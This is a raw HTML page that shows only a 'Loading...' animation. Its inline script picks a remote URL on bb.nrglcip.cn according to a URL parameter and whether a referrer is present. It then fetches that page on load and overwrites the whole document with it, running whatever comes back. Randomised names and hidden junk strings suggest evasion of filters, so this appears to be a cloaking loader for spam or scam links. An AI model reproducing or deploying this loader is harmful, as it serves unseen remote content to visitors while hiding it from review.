<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .rmhU9f1gw {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .rmhU9f1gw .B1pYjAta {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .rmhU9f1gw .content {
            line-height: 50px;
            text-align: center
        }

        .rmhU9f1gw .img {
            width: 100%
        }

        .rmhU9f1gw .MoLIPujK4 {
            text-align: center
        }

        .rmhU9f1gw .MoLIPujK4 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .rmhU9f1gw .MoLIPujK4 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .rmhU9f1gw .MoLIPujK4 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .rmhU9f1gw .MoLIPujK4 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .rmhU9f1gw .MoLIPujK4 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .rmhU9f1gw .MoLIPujK4 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .rmhU9f1gw .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function qcZeIrMQZrGd(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var h06mH = qcZeIrMQZrGd('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ h06mH +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ h06mH +".html?a=share";
		}
		
        wprEsW=url+"#"+new Date().getTime();
        wprEsW && function() {
            $.get(wprEsW, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<li style='display:none' >KUlFQPw8feNJRkN2rXH</li>
<li style='display:none' >KUlFQPw8feNJRkN2rXH</li>
<div style='display:none'>u0mmcuTX7Jj0v</div>
<p  style='display:none'>VahkixPswqTWRuYYIZ2xHr2HSLuN3HYcGXKFfSE4KotSwuN2rVKDTW7CPBbTDn</p>
<p  style='display:none'>VahkixPswqTWRuYYIZ2xHr2HSLuN3HYcGXKFfSE4KotSwuN2rVKDTW7CPBbTDn</p>
<img  src='' style='display:none'>
<ul style='display:none' >E66S8W6OmwOQg</ul><div class="rmhU9f1gw">
    <div class="B1pYjAta">
        <div class="MoLIPujK4">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<a  href='#' style='display:none'>dbupq3hxmd0xGkGiT6ATAeHkKvcu5wB8Hu6lKBVz80SWFiAqNcNJh4J3iJFTFyMgP9WepL4NaBUWx5pPUywgwB488VTeD</a>
<span style='display:none'>N4Ay1tHkj9vXVaYB0fOB8A4</span>
<img  src='' style='display:none'>
<span style='display:none'>N4Ay1tHkj9vXVaYB0fOB8A4</span></body>
</html>